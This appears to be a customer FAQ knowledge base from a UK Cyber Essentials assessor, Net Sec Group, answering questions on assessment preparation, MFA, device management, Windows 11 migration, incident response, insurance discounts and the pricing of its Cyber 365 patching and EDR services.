Keywords: Cyber 365, monitoring service, patching, EDR, pricing | Confidence: 0.9
Should I provide laptops to contractors?
For contractors working more than three months or needing admin access, yes. Full control over security configuration, patches and malware protection, and it's straightforward to demonstrate compliance during assessment. For short-term contractors working under a month, MDM on their personal device or restricting them to a virtual desktop may be more practical.
Keywords: contractor laptop, company device, MDM, virtual desktop | Confidence: 0.9
I just discovered hidden contractors before my assessment. What do I do?
Contact me immediately to discuss the situation. Two options: postpone the assessment while you bring contractor devices up to CE standard (proper patching, MFA, malware protection), or restructure access so those contractors genuinely don't touch your in-scope systems. Don't try to hide them - if I discover unmanaged contractor access during the screenshare, it's a fail.
Keywords: hidden contractors, last-minute, assessment, postpone | Confidence: 0.9
How quickly must I respond to maintain CE compliance?
CE doesn't specify incident response timeframes, but if an incident compromises your CE controls you need to act fast. Compromised admin credentials or disabled malware protection? Immediate response is required, within hours at most. A phishing attempt that didn't succeed is lower priority. Data breaches involving personal data put you on a 72-hour ICO notification clock.
Keywords: response time, incident, CE compliance, ICO, 72 hours | Confidence: 0.88
How do I preserve digital evidence during response?
Don't power off affected systems - you'll lose RAM contents (running processes, encryption keys, active network connections). Disconnect from the network instead and take screenshots of error messages, malware alerts and unusual processes. Save system logs before they rotate because law enforcement and insurers want this evidence intact.
Keywords: digital evidence, forensics, don't power off, network disconnect | Confidence: 0.88
What should I tell management during active incidents?
Provide clear, factual updates without technical jargon. Focus on business impact: what's affected, who's impacted, what decisions they need to make (authorise system shutdowns, approve customer notifications, engage legal counsel). Update every 2-4 hours during active incidents, even if the update is 'no change, still investigating.' Don't speculate about cause until you know.
Keywords: management communication, incident updates, business impact | Confidence: 0.88
What are most common lessons learned from CE incidents?
The patterns I see in incidents involving CE-certified businesses: patching was actually behind schedule despite claims otherwise, MFA gaps on forgotten cloud services, admin accounts being used for daily work (violating separation), staff who didn't know who to contact, backup recovery never tested. Almost always the same story: 'we thought we were compliant but hadn't actually checked recently.'
Keywords: lessons learned, incidents, patching, MFA gaps, admin accounts | Confidence: 0.88
What's the biggest incident response mistake?
Delaying containment while trying to investigate the cause. When you discover a security incident, isolate affected systems immediately. Don't spend hours trying to understand what happened before disconnecting the compromised device. Contain the threat first and investigate second. Every minute of delay during active malware spread or data exfiltration increases the damage.
Keywords: incident mistake, containment, delay, isolate first | Confidence: 0.92
Is the discount automatic when I get certified?
No, you must notify your insurer and provide your CE certificate yourself. Contact your broker directly, send the IASME certificate PDF, include your policy number, ask them to note the certification on your file. Some insurers apply mid-term adjustments while others note it for your next renewal.
Keywords: insurance discount, notification, IASME certificate, broker | Confidence: 0.88
Which insurance policies benefit from CE certification?
Cyber and data breach insurance benefits most directly. Professional indemnity sometimes offers small reductions (5-10%) because CE reduces data breach risk. Directors and officers liability can benefit if cyber risk is a board concern. General business insurance rarely offers CE-specific discounts, but some underwriters factor it into overall risk scoring.
Keywords: insurance policies, cyber insurance, professional indemnity, D&O | Confidence: 0.85
When should I contact insurers about CE certification?
The day you receive your certificate is the ideal time. If you're shopping for new insurance, provide the certificate during quoting to get the best rates upfront. If you're mid-policy, notify your broker immediately so they can note it for renewal or request a mid-term adjustment. Don't wait until renewal - you'll miss months of potential savings.
Keywords: insurer contact, timing, renewal, mid-term adjustment | Confidence: 0.88
How quickly can I get premium reductions after certification?
New policies: discount applies immediately if you provide the CE certificate during quoting. Existing policies: most insurers note it for your next renewal (could be months away). Some apply mid-term adjustments within 2-4 weeks. Ask your broker specifically whether a mid-term change is possible.
Keywords: premium reduction, timing, mid-term, renewal | Confidence: 0.85
How do I maintain insurance benefits long-term?
Never let your CE certificate expire between renewal periods. If it lapses, insurers may revoke your discount - some may increase your premium at renewal. Renew at least one month before expiry so there's no gap. Keep your insurer updated on security improvements (EDR deployment, incident response plan) and maintain incident-free claims history for the strongest renewal terms.
Keywords: maintain insurance, CE renewal, certificate expiry, long-term | Confidence: 0.85
What's the best update strategy for Mac environments?
If you have under 20 Macs in your estate, enable automatic updates on each machine (System Settings, General, Software Update) and check weekly that nothing's pending past 14 days. Larger deployments need MDM to push updates centrally and track compliance. Apple doesn't publish CVSS scores, so treat all security updates as high priority and apply within 14 days.
Keywords: macOS updates, strategy, automatic updates, MDM, 14-day | Confidence: 0.88
Are Macs worth the compliance effort?
Macs are often easier to certify than Windows. Consistent built-in security: XProtect for malware, Gatekeeper for app control, built-in firewall, FileVault for encryption. The effort is proving compliance to an assessor, which requires either MDM (for CE Plus evidence) or manual verification of each machine. If you're already on Microsoft 365, Intune manages Macs alongside your Windows devices.
Keywords: Mac compliance, XProtect, Gatekeeper, Intune, effort | Confidence: 0.88
What's the difference between 'recommended' and 'required' for MFA under Danzell?
Currently (before April 2026), MFA is required for admin and privileged accounts on cloud services. Currently it's recommended for everyone else but that changes soon. From April 2026 under Danzell v3.3, MFA becomes required for all cloud service accounts where the service supports it - admin and standard users. If you're preparing now, treat it as required already because you need it before April 2026 anyway.
Keywords: MFA, recommended vs required, Danzell, April 2026, timeline | Confidence: 0.95
How long does MDM deployment take?
Small businesses (10-20 devices): allow 1-2 weeks. MDM platform setup takes a couple of days, policy configuration another 2-3 days, then pilot testing before full rollout. 50+ devices: allow 3-4 weeks to account for testing across device types and troubleshooting edge cases. User enrolment itself takes 15-30 minutes per device.
Keywords: MDM deployment, timeline, enrollment, rollout | Confidence: 0.88
What happens if vulnerabilities are found during scanning?
It depends on the severity of the findings. Critical vulnerabilities (CVSS 9.0+) are an automatic fail. High vulnerabilities (CVSS 7.0-8.9) fail if the patch has been available for more than 14 days. You get a remediation report detailing each finding, and you've got 28 days to fix the issues and request re-scanning. Most vulnerabilities I find are missing patches that can be applied quickly.
Keywords: vulnerability scanning, findings, remediation, CVSS, 28 days | Confidence: 0.9
What about systems that require scheduled downtime for patching?
You still need critical and high-risk patches applied within 14 days, even if the system requires a maintenance window. Weekly maintenance windows give you sufficient buffer, but monthly windows simply do not. If a system genuinely can't be patched within 14 days due to operational requirements, document why and discuss compensating controls with your assessor.
Keywords: scheduled downtime, patching, 14-day, maintenance window | Confidence: 0.9
How long does Windows 11 migration take?
Small businesses with 10-25 devices should allow 2-4 weeks. Medium businesses with 25-100 devices should allow 4-8 weeks. That covers hardware assessment, procurement of replacement machines, Windows 11 deployment, data migration and user setup. Hardware procurement is the bottleneck (2-3 weeks lead time), not the migration work itself. Start planning at least 3 months before you need it done.
Keywords: Windows 11 migration, timeline, deployment, procurement | Confidence: 0.85
It's September 2025 and I haven't started. What do I do?
You've got 4-6 weeks before Windows 10 end-of-life. Triage the situation immediately by running PC Health Check across all devices to identify which can upgrade in-place (do those first, quickest option). For incompatible machines that can't upgrade, order replacements now - hardware lead times eat into your window. If replacements can't arrive in time, consider Microsoft's Extended Security Updates (paid, buys you time) or moving those devices off-scope temporarily.
Keywords: emergency, September 2025, Windows 10 EOL, triage, ESU | Confidence: 0.88
How long does EDR deployment take?
For a typical SME with 10-50 devices, allow 1-2 weeks. Day one: console setup and policy configuration. Day two: pilot deployment on 5-10 devices to verify no conflicts. Days 3-5: roll out to remaining devices. Week two: tune alert thresholds and resolve false positives. Our Cyber 365 EDR deployment is managed by me, so your IT team's involvement is minimal.
Keywords: EDR deployment, timeline, 1-2 weeks, pilot, rollout | Confidence: 0.88
Should we manage EDR internally or use managed services?
Managed EDR makes sense for most SMEs. Managing it internally requires dedicated security staff with expertise in threat analysis, 24/7 monitoring, and time to investigate alerts. If you have no dedicated security team (and most SMEs don't), managed EDR solves that problem entirely. Managed EDR gives you professional monitoring without the headcount. Our Cyber 365 service (£15/device/month) includes full management - you don't touch the console.
Keywords: managed EDR, internal vs managed, SOC, Cyber 365 | Confidence: 0.88
How quickly can Net Sec Group deploy EDR?
Week one: discovery call to understand your environment, then I configure the EDR console and deploy agents to a pilot group. Week two: full rollout to all devices with policy tuning. Most businesses fully protected within 10-14 days. If there's an active threat or urgent deadline, emergency deployment in 48-72 hours with a compressed pilot phase.
Keywords: Net Sec Group, EDR deployment, 10-14 days, emergency | Confidence: 0.88
CE vs CE Plus
How much preparation time do I really need?
The assessment itself takes 2-4 hours, but preparation varies depending on how compliant you already are. If your patch management is solid and MFA is enabled everywhere, a week of evidence gathering is enough. Starting from scratch on controls like admin account separation or firewall rules? Allow 4-6 weeks of preparation and remediation time. The biggest time sink is usually discovering cloud services you didn't know staff were using.
Keywords: preparation time, CE Plus, assessment, timeline | Confidence: 0.92
What's the best remote access method for assessments?
I use Microsoft Teams for CE Plus assessments - simple and most businesses already have it. Make sure you've got a stable internet connection and test screen sharing beforehand. I'll need you to share your screen while navigating admin portals, so dual monitors help if you've got them.
Keywords: remote access, Teams, screen sharing, CE Plus | Confidence: 0.95
Do I need all systems accessible during assessment?
All in-scope systems must be accessible during CE Plus: workstations, servers, firewalls, cloud admin consoles, and any mobile devices I need to check. If a system is genuinely offline (hardware failure), I'll work around it by checking another device of the same type. But if you can't access a key admin portal because you forgot the password, that delays everything.
Keywords: system access, assessment, admin portal, CE Plus | Confidence: 0.92
Do you charge extra for assessment preparation?
No, preparation support is included in all packages. For standard CE (£320-£600 for Basic, from £1,200 for Plus), I'll guide you through remediation if issues are found and re-test at no extra cost. I support you until you pass with no charge per attempt.
Keywords: preparation cost, included, remediation, re-test, pricing | Confidence: 0.95
What's the biggest mistake that causes assessment delays?
Not patching properly is the biggest cause. Most organisations rely on Windows auto-updates, which aren't enough for third-party software like Adobe, Java or browser extensions. The 14-day window for critical/high-risk patches catches most businesses out. Second biggest: forgetting MFA on all cloud services, especially the ones you don't think about. Accounting software and domain registrars are the usual culprits. I see it every week during assessments.
Keywords: assessment delay, patching, 14-day, MFA, third-party software | Confidence: 0.95
What's the difference between Azure AD security defaults and conditional access?
Security Defaults is free and automatically enforces MFA for all users using the Microsoft Authenticator app. Simple, no configuration, works for most small businesses. Conditional Access (requires Entra ID P1, included in M365 Business Premium) lets you create rules: require MFA only from outside the office, block sign-ins from certain countries, require compliant devices. For CE, Security Defaults meets the requirement. Conditional Access gives you more control but isn't mandatory.
Keywords: Security Defaults, Conditional Access, Entra ID, MFA, Microsoft 365 | Confidence: 0.9
Do "managed by someone else" services still count?
Yes, if business data goes into it, it's in your CE scope regardless of who manages it. Website hosted by an agency, cloud backup managed by your IT provider, email hosted by a third party, SaaS apps procured by individual departments. You need to either demonstrate the controls yourself or get documented evidence from whoever manages the service.
Keywords: managed services, third party, scope, responsibility | Confidence: 0.92
What information do assessors need for each service?
For each cloud service in scope, I need the service name (e.g. 'Microsoft 365', 'Xero'), what you use it for (e.g. 'email and file storage', 'accounting'), and during CE Plus, admin access to show me the MFA and user settings. A simple spreadsheet listing all your cloud services with these details speeds up the assessment.
Keywords: cloud services, service list, assessment evidence, admin access | Confidence: 0.92
Do all cloud services need MFA enabled?
From April 2026 under Danzell v3.3, yes. MFA mandatory on all cloud service accounts (admin and standard users) where the service supports it. Until then, only required on admin accounts. The MFA must use a separate device or app, not just SMS to the same phone. If a cloud service genuinely doesn't support MFA, document it. Most modern services support MFA now so this is rarely an issue.
Keywords: MFA, cloud services, Danzell, mandatory, April 2026 | Confidence: 0.95
What compliance reports do I need for CE renewal?
For CE Basic renewal, just resubmit a fresh questionnaire because no formal reports are needed. CE Plus renewal: have patch compliance reports showing 14-day installation rates, MFA configuration evidence for all cloud services, firewall rule documentation, user access control lists showing separate admin accounts, malware protection status across all devices. Most of this comes straight from your admin portals on the day.
Keywords: renewal, compliance reports, evidence, CE Plus, CE Basic | Confidence: 0.9
What's included in your monitoring service?
Patching (£8/device/month) handles automated patch deployment with compliance tracking against the 14-day requirement. EDR + Patching (£15/device/month) adds endpoint protection with 24/7 automated threat isolation. Vulnerability Scanning (from £2.50/agent/month) provides continuous scanning with prioritised remediation guidance. All services include compliance reporting you can use as CE assessment evidence.
Keywords: Cyber 365, monitoring, patching, EDR, pricing | Confidence: 0.9
What's the biggest contractor compliance mistake?
Not including contractors in CE scope at all. I regularly see organisations fail CE Plus because they didn't realise contractors' devices were in scope. Second biggest mistake: assuming contractors handle their own security. They might handle security, but you need evidence proving it. Under Danzell, any device accessing organisational data is in scope. That includes every contractor laptop and phone.
Keywords: contractor, scope, compliance mistake, Danzell, BYOD | Confidence: 0.92
How much can Cyber Essentials reduce my insurance premiums?
Typical reductions: 5-15% for CE Basic, 10-25% for CE Plus. Some insurers go higher (up to 30%) if you combine CE Plus with documented incident response procedures and continuous monitoring. The exact discount depends on your insurer, your sector and the rest of your security posture. Ask your broker what discount they can get with CE certification.
Keywords: insurance, premium reduction, discount, CE Basic, CE Plus | Confidence: 0.85
Do all insurers offer discounts for CE certification?
Not all, but most major UK cyber insurance providers do. CFC, Coalition, Hiscox, AXA and Beazley typically recognise CE certification. Discounts vary between providers, so get quotes from at least three. Some won't offer a specific CE discount but factor it into their overall risk assessment, which still reduces your premium.
Keywords: insurers, discount, CFC, Coalition, Hiscox, CE certification | Confidence: 0.85
How do I maximise insurance discounts from CE certification?
Get CE Plus rather than Basic - typically qualifies for double the discount. Tell your insurer proactively rather than waiting for renewal. Combine CE with other controls (EDR deployment, documented incident response plan) for additional reductions. Some insurers offer a further 5-10% if you can demonstrate continuous compliance monitoring rather than point-in-time certification.
Keywords: maximise discount, CE Plus, insurance, continuous monitoring | Confidence: 0.85
What evidence do insurers want beyond the CE certificate?
Most accept the CE certificate itself, issued by IASME. Some ask additional questions about security practices beyond the five CE controls - backup procedures, incident response plans, staff training records. CE Plus gives insurers more confidence than self-assessed CE Basic. The technical verification carries more weight with underwriters than self-assessment alone.
Keywords: insurance evidence, IASME certificate, security questionnaire | Confidence: 0.85
Should I consider CE Plus for additional insurance benefits?
CE Plus typically delivers 15-25% premium discounts versus 5-10% for CE Basic, which often justifies the price difference. On a £5,000 annual cyber insurance policy, the extra £500 to £800 for CE Plus could save £500 to £750 annually in premiums alone. Before counting better coverage limits, lower deductibles and faster claims processing.
Keywords: CE Plus, insurance benefits, premium discount, ROI | Confidence: 0.85
What's the biggest mistake in CE insurance integration?
Getting certified but never telling your insurer. I see this problem constantly where a business spends £1,500 on CE Plus, qualifies for a 20% discount, but doesn't notify their insurer until renewal six months later, and loses six months of potential savings in the process. Contact your insurer the day you receive your certificate. Some apply the discount mid-term, others note it for renewal.
Keywords: insurance mistake, notification, insurer, discount timing | Confidence: 0.9
What's the best insurance result you've seen from CE certification?
The strongest outcomes come from businesses combining CE Plus with continuous monitoring and clean claims history. 20-30% premium reductions, higher coverage limits (£2M instead of £1M), lower deductibles, priority incident response from the insurer. Professional services firms (law, finance) tend to see the biggest improvements because insurers rate their data risk highly.
Keywords: insurance results, premium reduction, coverage, professional services | Confidence: 0.82
Do small businesses see meaningful insurance benefits?
Yes, small businesses often see proportionally bigger benefits than enterprises. Many can't get cyber insurance at all without CE - the certificate transforms you from 'uninsurable' to 'insurable.' Already have insurance? The 10-25% CE Plus discount on a £2,000-5,000 policy is £200-1,250 per year. Often covers a significant chunk of certification cost.
Keywords: small business, insurance, insurability, CE Plus, discount | Confidence: 0.85
How do we demonstrate XProtect is working?
Check System Settings, Privacy and Security, scroll to the Security section to confirm XProtect is active (always on by default). For CE Plus, I'll also want to see automatic updates enabled so XProtect definitions stay current. Quick manual check: open Terminal and type 'system_profiler SPInstallHistoryDataType | grep XProtect' to show recent definition updates.
Keywords: XProtect, macOS, malware protection, evidence, assessment | Confidence: 0.88
What's the difference between macOS application firewall and network firewall?
The macOS application firewall (System Settings, Network, Firewall) controls inbound connections to specific apps. It's what I check during assessment - enable it and set it to block all incoming connections except those required by your apps. The network firewall sits at your router or gateway and controls traffic at the network level. You need both working together for proper protection: application firewall on each Mac, boundary firewall protecting the network.
Keywords: macOS firewall, application firewall, network firewall, boundary | Confidence: 0.9
How do we handle the 14-day update requirement when Apple doesn't publish CVSS scores?
Apple doesn't publish CVSS scores for their updates. Treat all macOS security updates as high or critical and apply within 14 days of release. I accept this approach during assessment, so check Software Update settings to confirm automatic updates are enabled, then verify nothing's older than 14 days in the update history. Document your policy as 'all Apple security updates applied within 14 days regardless of severity.' Keep it simple.
Keywords: macOS updates, 14-day, CVSS, Apple, patching policy | Confidence: 0.9
How does Gatekeeper help with application allowlisting?
Gatekeeper blocks unsigned or unnotarised apps by default - basic application control for CE compliance. It verifies developer signatures and quarantines apps downloaded from the internet that don't pass checks. For most businesses, Gatekeeper set to 'App Store and identified developers' satisfies CE secure configuration requirements. Full enterprise allowlisting (controlling exactly which apps can run) requires MDM, but Gatekeeper is sufficient for CE.
Keywords: Gatekeeper, allowlisting, macOS, application control, notarisation | Confidence: 0.9
Do small businesses really need MDM for just a few phones?
Depends on how those phones are used. Email and calendar only, no sensitive documents or business apps? CE requirements are minimal: devices updated, lock screen on, MFA on the email account. If phones access cloud storage, CRM, accounting or other business systems, you need MDM to prove compliance during CE Plus. For CE Basic (self-assessment), you can self-declare controls without MDM evidence.
Keywords: small business, MDM, mobile, CE Basic, CE Plus | Confidence: 0.9
Can iOS built-in security replace MDM requirements?
iOS has strong built-in security (sandboxing, App Store review, encryption), but that doesn't replace MDM for CE Plus. The issue isn't whether the phone is secure - it's whether you can prove it to me. MDM gives you screenshots of enforced policies, device compliance status, remote management capability. Without MDM, you're asking me to take your word for it. That works for CE Basic self-assessment but not for CE Plus technical verification.
Keywords: iOS security, MDM, CE Plus, evidence, built-in security | Confidence: 0.9
How do we handle a shared shop floor tablet?
Shared tablets (warehouse, retail, factory floor) have specific CE considerations. A shared PIN is acceptable if documented and justified - impractical for 20 staff to have individual accounts on a stock-check tablet. Use MDM to lock it into kiosk mode or restrict it to specific apps. OS updates within 14 days, malware protection if it's Android. Document clearly why shared access is necessary for the role.
Keywords: shared tablet, kiosk mode, shop floor, PIN, MDM | Confidence: 0.88
Our phones only access email - do we still need full MDM?
For CE Basic with email-only phones, lightweight management may suffice. Exchange ActiveSync or Google Workspace mobile policies can enforce passcodes and remote wipe without full MDM. For CE Plus, you need to demonstrate these controls to me, so even 'email-only' devices should be managed through Intune or equivalent. And the definition of 'email-only' is strict. If the phone also has Teams, OneDrive or any other business app, it's not email-only.
Keywords: email-only, mobile, ActiveSync, MDM, CE Plus | Confidence: 0.88
What counts as "email-only" access?
True email-only means only an email client configured. No Teams, OneDrive, Slack, CRM, cloud storage, VPN, or any other business application. If staff use the phone for anything beyond reading and sending email, it's not email-only for CE purposes. Most businesses think their phones are email-only until they realise staff also use Teams, OneDrive and a couple of SaaS apps on the same device. I check this during every assessment and it catches people out regularly.
Keywords: email-only, definition, business apps, scope | Confidence: 0.9
How many devices will actually be scanned during my CE+ assessment?
CE Plus uses statistical sampling, not every device. If you have 1-5 devices, I check all of them. For 6-20 devices, typically 5-8 get sampled from the fleet. For 21-50 devices, around 8-12 are checked across categories. For 51+ devices, I take a representative sample across device types. I always include a mix of Windows, Mac, mobile and server. Under Danzell, a second device from the same type must be checked for each category.
Keywords: device sampling, CE Plus, scanning, Danzell, sample size | Confidence: 0.92
What's the difference between the three scanning methods?
There are three main approaches to scanning. Unauthenticated external scanning checks your internet-facing IPs for open ports and exposed services - basically what an attacker sees. Authenticated internal scanning logs into devices to check patch levels, configurations and installed software. Credentialed vulnerability scanning combines both to identify specific CVEs and missing patches. Most assessments use all three approaches together.
Keywords: scanning methods, unauthenticated, authenticated, vulnerability scanning | Confidence: 0.88
What vulnerability severity levels cause failures?
Critical (CVSS 9.0-10.0) is an automatic fail with no exceptions at all under any circumstances. High (CVSS 7.0-8.9) fails if the patch has been available more than 14 days. Medium (CVSS 4.0-6.9) gets flagged but won't fail you unless it shows a pattern of poor patch management. Low severity findings get noted, but they won't affect your certification.
Keywords: vulnerability severity, CVSS, critical, high, 14-day, failure | Confidence: 0.92
What's the win rate for tenders requiring Cyber Essentials?
If the tender requires CE and you have it, win rate depends on the usual factors - price, quality, track record. If the tender requires CE and you don't have it, your win rate is zero. You're automatically disqualified from the bidding process. Central government contracts handling personal data or ICT services require CE minimum under PPN 09/14. That number keeps growing, and plenty of large private sector organisations follow the same approach now.
Keywords: tenders, government contracts, PPN 09/14, win rate, disqualification | Confidence: 0.9
Can I use the registry hack to bypass Windows 11 requirements?
Technically yes, but it creates problems for CE. Microsoft doesn't support registry-bypassed installations, so the device may not receive all security updates reliably. That could fail the 14-day patching requirement. If I discover an unsupported Windows 11 installation during assessment, I'll flag it. Replace the hardware, stay on Windows 10 while it's still supported, or do a device refresh.
Keywords: Windows 11, registry hack, TPM bypass, unsupported, compliance | Confidence: 0.9
How do I know if my PC has TPM 2.0?
Navigate to: Settings, Privacy and Security, Windows Security, Device Security, Security Processor. It'll show your TPM version in that panel. Or press Windows+R, type 'tpm.msc' and hit Enter - the TPM Management console shows the spec version. Most business PCs from 2018 onwards have TPM 2.0. If yours shows TPM 1.2, it won't support Windows 11. That hardware needs replacing before Windows 10 end-of-life.
Keywords: TPM 2.0, Windows 11, compatibility, check TPM, hardware | Confidence: 0.9
Can I mix Windows 10 and Windows 11 during the transition?
Yes, mixed Windows 10 and 11 environments are fine for CE as long as both are receiving security updates. Windows 10 support ends October 2025, so plan your migration before then. Same compliance requirements either way: patches within 14 days, malware protection active, firewall enabled, admin accounts separated.
Keywords: Windows 10, Windows 11, mixed environment, migration, end of life | Confidence: 0.9
How does Windows 11 migration affect my Cyber Essentials assessment?
Windows 11 actually simplifies CE assessment with better security defaults than Windows 10. TPM 2.0 makes BitLocker easier, Credential Guard is built in, secure boot reduces firmware attack surface. During migration, keep both operating systems patched within 14 days and make sure no devices fall through the gap between decommissioning Win10 and deploying Win11. If possible, schedule your assessment after migration completes. Avoid scheduling it during the migration itself if at all possible.
Keywords: Windows 11 migration, CE assessment, TPM 2.0, security defaults | Confidence: 0.88
What about legacy systems that cannot run modern EDR?
Legacy systems too old for modern EDR need alternative protection. Network segmentation is the answer: isolate them on a separate VLAN with strict firewall rules, monitor all traffic to and from the segment, and limit who can access them. If the system can't run any endpoint protection, document why and show compensating controls. For CE, talk to your assessor about whether the system can be excluded from scope. I see these conversations regularly during assessment planning.
Keywords: legacy systems, EDR, network segmentation, VLAN, compensating controls | Confidence: 0.85
What makes Net Sec Group's EDR service different?
The Cyber 365 EDR consistently leads in MITRE ATT&CK evaluations. At £15/device/month, you get enterprise-grade detection on SME budgets. Automated threat isolation means ransomware gets contained in seconds without waiting for a human. Compliance reporting maps directly to CE requirements. I handle all the management so you don't need a dedicated security team.
Keywords: Net Sec Group, Cyber 365, EDR, managed service | Confidence: 0.9
Common Failures & Fixes
Do I need to test everything before assessment day?
Make sure everything you declared in your CE Basic submission actually reflects your current configuration. Don't assume it's still accurate if you filled it in weeks ago. If I find issues during the assessment, I'll guide you through remediation - don't panic about missing something. But the closer your submission matches reality, the smoother it goes.
Keywords: assessment preparation, CE Basic, testing, configuration | Confidence: 0.85
What if my internet connection fails during assessment?
Contact me straight away and I'll reschedule at no extra charge. Worth having a mobile hotspot as backup since the assessment runs over Microsoft Teams screenshare. If the connection drops mid-assessment, I can usually pick up where we left off the same day or the next morning.
Keywords: internet connection, assessment, reschedule, Teams | Confidence: 0.8
What if key person is unavailable assessment day?
Reschedule with me as soon as you know. The assessment needs someone with admin access and detailed knowledge of your systems. Attempting it without the right person usually leads to delays or failure because I need live demonstrations of your security controls. I'd rather reschedule than waste everyone's time.
Keywords: key person, reschedule, admin access, assessment | Confidence: 0.8
What happens if assessor finds something wrong during assessment?
I'll document the finding and keep checking other areas to give you the complete picture. You'll get a detailed report of everything that needs fixing before certification. I don't stop at the first problem. Much more useful to know all the issues at once so you can fix them in one go rather than discovering them one at a time across multiple assessments.
Keywords: non-conformance, assessment findings, remediation, report | Confidence: 0.85
Can I refuse assessor requests?
You can decline requests that fall outside your declared scope or breach your security policies. But refusing legitimate verification requests will likely result in a fail for that control area. If you think a request is inappropriate, tell me. There's usually a good reason behind what I'm asking to see.
Keywords: assessor requests, scope, refusal, assessment | Confidence: 0.8
What if we discover issues during assessment?
Issues found during assessment get documented as non-conformances. You'll get detailed findings explaining what needs fixing. Fix the issues, then I reassess those specific areas. You don't redo the entire assessment, just the parts that failed.
Keywords: non-conformance, issues, remediation, reassessment | Confidence: 0.85
Can assessment continue if we find problems?
Yes, I keep checking all control areas even after finding problems. Better to give you everything that needs fixing in one go, rather than discovering issues one at a time across multiple sessions. The final report covers all non-conformances at once.
Keywords: assessment continuation, problems, complete report, non-conformances | Confidence: 0.85
What if the fix is complex and takes weeks?
Talk to me before the assessment if you know there's a major remediation needed. I might recommend postponing until the fix is in place, or proceeding anyway so you get a full picture of all issues. Either way, certification only gets awarded after everything's resolved. For complex changes, scheduling the reassessment a few weeks after initial assessment gives you time to fix things properly.
Keywords: complex fix, remediation timeline, postpone, reassessment | Confidence: 0.8
What if I don't know the answer to a question?
Be honest about any knowledge gaps you have. Say 'I'm not sure, let me check that for you now' rather than guessing. I'd much rather you look something up than give me incorrect information. Take notes on anything you can't answer immediately and follow up promptly. A wrong answer that leads to a false certification helps nobody.
Keywords: don't know, honesty, assessment, knowledge gaps | Confidence: 0.85
Are there different types of pass/fail outcomes?
CE Plus is strictly pass or fail with no partial passes, no grades and no scores. You either meet all control requirements or you don't. If I find non-conformances, you fix them and I reassess those specific areas. Once everything passes, you get the certificate. There's also 'minor observations' - recommendations for improvement that don't prevent certification.
Keywords: pass fail, outcomes, CE Plus, non-conformance, minor observations | Confidence: 0.85
Can I get feedback on what went well/poorly?
You'll get detailed feedback on any non-conformances - exactly which controls didn't meet requirements and what remediation is needed. For areas that passed, the certificate itself confirms those controls were acceptable. If you want broader feedback on your security posture beyond the pass/fail assessment, I can discuss that separately as part of consultancy.
Keywords: feedback, assessment report, non-conformances, security posture | Confidence: 0.8
What's the biggest cloud migration mistake for CE compliance?
Not updating your CE scope documentation during the transition. Organisations add cloud services during migration and forget to include them in scope. Then during assessment, I discover Microsoft 365 or AWS accounts that aren't documented and don't have MFA configured. I see this problem constantly during assessments. The second most common mistake is assuming the cloud provider handles all security. Under the shared responsibility model, you're still responsible for configuring access controls, MFA, and user management.
Keywords: cloud migration, mistakes, scope, documentation, shared responsibility | Confidence: 0.85
What should be migrated first for CE compliance?
Start with low-risk, non-critical systems first and test your cloud security controls and identify gaps before moving sensitive data. Make sure MFA, logging, and backup are working in the cloud environment before migrating production workloads. Keep on-premise systems running during initial migration so you can roll back if something goes wrong.
Keywords: migration priority, non-critical first, cloud security, rollback | Confidence: 0.75
What if cloud migration breaks CE compliance?
Stop migrating and fix the compliance gap before continuing. Most common issues: MFA not configured on new cloud admin accounts, unpatched cloud workloads, or network controls not set up correctly. Document all cloud services in your scope and verify each one meets CE requirements before your next certification. Don't push through a broken migration and hope it sorts itself out before assessment day.
Keywords: cloud migration, compliance gap, remediation, scope | Confidence: 0.8
Can we add services during assessment?
Yes, if you genuinely forgot one during preparation. Tell me during the assessment and I'll add it. But if that service isn't configured correctly - missing MFA, wrong security settings - you need to fix it before I can certify you. Better to find everything before assessment day. Check credit card statements, ask each department what tools they use, review browser bookmarks across the business.
Keywords: add services, assessment, forgotten, discovery, scope | Confidence: 0.8
What's the success rate correlation with thoroughness?
Organisations that spend one to two weeks properly preparing - complete inventory, verify all controls, organise evidence - pass first time about 80-90% of the time. Those that rush it and don't check their CE Basic answers carefully fail about 60-70% of the time. The preparation investment pays for itself every time. Fixing issues after a failed assessment always takes longer and costs more than getting it right first time.
Keywords: success rate, preparation, first time pass, thoroughness | Confidence: 0.8
What compliance metrics should I track?
Focus on the five control areas for tracking. Patch compliance rate: what percentage of devices are patched within 14 days (target 100%). MFA enrollment: what percentage of cloud accounts have MFA enabled (target 100%). Admin account hygiene: how many admin accounts exist and when were they last used. Malware protection coverage: percentage of devices with active, updated protection. Time to remediate: how long it takes to fix newly discovered gaps. These five metrics map directly to what I check during assessment.
Keywords: compliance metrics, KPIs, tracking, patch rate, MFA enrollment | Confidence: 0.8
How do I prioritise compliance issues for remediation?
Prioritise remediation based on direct compliance impact. Critical (fix immediately): patches overdue more than 14 days, MFA not enabled on cloud accounts, admin accounts used for daily work. These are all automatic assessment failures under current rules. High (fix within a week): malware protection offline, default passwords not changed, firewall rules undocumented. Medium (fix before next assessment): security logging gaps, documentation updates. Fix the critical items first because those are the ones that actually fail assessments.
Keywords: prioritisation, remediation, compliance, critical, assessment failure | Confidence: 0.85
What's the biggest monitoring mistake?
Only checking compliance at renewal time, which is remarkably common. I see this problem constantly during renewal conversations. Organisations assume they're still compliant 11 months after certification, then discover at renewal that patches have been missed for months, new cloud services were added without MFA, or admin accounts are being misused. By that point it's always a scramble. Check patches weekly, MFA enrollment monthly, full controls review quarterly.
Keywords: monitoring mistake, renewal, compliance drift, ongoing monitoring | Confidence: 0.85
Assessment is next week and contractor won't comply. Options?
You have three options here to resolve it. Remove the contractor's access temporarily - revoke their accounts until after assessment, configure security properly, reinstate them. Issue one of your own laptops that meets CE requirements and have the contractor use that instead. Or reschedule the assessment with me for two to three weeks while you resolve it. The worst option is doing nothing and hoping I don't check their device, because I absolutely will.
Keywords: contractor compliance, last minute, options, reschedule, assessment | Confidence: 0.85
What if we discover contractor issues during your assessment?
I'll document it as a non-conformance, same as any other compliance gap. Contractor devices and accounts in scope must meet the same CE standards as employee ones. You need to remediate the issue - fix the contractor's device configuration, revoke access, or replace with a compliant setup - before certification. One of the most common surprises during CE Plus assessments.
Keywords: contractor issues, assessment, non-conformance, remediation | Confidence: 0.8
What if incident reveals CE compliance gaps?
Fix the gaps immediately and document the remediation. Don't panic - this happens more often than businesses admit. If patches are missing, apply them now before I arrive. If MFA is not enforced, enable it immediately. Be honest in your incident report about what wasn't in place. Your insurer needs accurate information, and trying to hide compliance gaps during an active incident always makes things worse. Once remediated, review all five controls to make sure nothing else has drifted.
Keywords: incident, compliance gaps, remediation, honesty, insurance | Confidence: 0.85
Should I document failed response attempts?
